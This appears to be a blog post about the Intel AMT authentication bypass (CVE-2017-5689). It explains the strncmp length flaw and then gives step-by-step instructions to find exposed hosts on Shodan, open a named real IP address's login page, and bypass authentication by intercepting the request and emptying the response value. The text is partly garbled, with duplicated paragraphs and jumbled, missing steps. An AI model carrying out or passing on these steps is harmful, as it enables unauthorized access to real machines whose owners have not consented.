Intel AMT Vulnerability Allow Hack Remotely Critical Escalation Of Privilege Bug
The vulnerability, labeled CVE-2017-5689,
affects Intel remote management technologies, including Active
Management Technology (AMT), Intel Standard Manageability (ISM), and
Intel Small Business Technology (SBT) software, versions 6 through 11.6.
To protect Intel AMT Web Interface from unauthorized users, the service makes use of HTTP Digest and Kerberos authentication.
The escalation of privilege vulnerability resides in the way Intel AMT Web Interface handles user authentication over HTTP Digest protocol, which is based on a simple challenge-response paradigm.
Before going into the technical details about the exploitation of this vulnerability, first, you need to know how the Digest authentication works.
The Digest authentication completes in the following steps:
2. Go to Open the First Link : http://187.213.218.159:16992/logon.htm
4. Enter the username : admin and remove the response value ="",
5. Finally I Got it Access
POC Video : https://goo.gl/V4zs2N
Where the Intel AMT Vulnerability resides?
To protect Intel AMT Web Interface from unauthorized users, the service makes use of HTTP Digest and Kerberos authentication.
The escalation of privilege vulnerability resides in the way Intel AMT Web Interface handles user authentication over HTTP Digest protocol, which is based on a simple challenge-response paradigm.
Before going into the technical details about the exploitation of this vulnerability, first, you need to know how the Digest authentication works.
The Digest authentication completes in the following steps:
- Client requests server to initiate login, and in response, the server returns a randomly generated 'nonce' value, the HTTP method, and the requested URI.
- Next, the user is prompted to enter his username and password.
- Once entered, the client machine sends an encrypted string (referred as user_response)—generated by applying a hash function to the entered username and password, server-supplied nonce value, HTTP method, and the requested URI—to the server.
- The server also calculates a similar encrypted string (referred as computed_response) using username and password stored in the database and all the other three values.
- The server compares both the strings using the strncmp() function and if they match, it allows the user to log into the Intel AMT Web Interface.
Syntax example:Strncmp() is a binary safe string comparison function that returns a negative, zero, or a positive integer depending upon whether string_1 is greater or less than string_2, and if they are equal, it returns zero.
strncmp (string_1, string_2 , length)
—where, length parameter defines how many characters needs to be compared.
As, it’s obvious, for successful authentication, user_response variable
must be equal to computed_response variable; hence the strncmp()
function must return a zero value for any length.
But, according to the researcher, the programmers who coded this authentication process for Intel platform mistakenly used the length of the user_response variable in strncmp() function, instead of the computed_response variable for response_length parameter.
But, according to the researcher, the programmers who coded this authentication process for Intel platform mistakenly used the length of the user_response variable in strncmp() function, instead of the computed_response variable for response_length parameter.
Step By Step :
1. Go to Shodan Enter " Active Management Technologies
2. Go to Open the First Link : http://187.213.218.159:16992/logon.htm
3. Go to Login Page and Enter the Empty login and Intercept Data
5. Finally I Got it Access
POC Video : https://goo.gl/V4zs2N
Comments
Post a Comment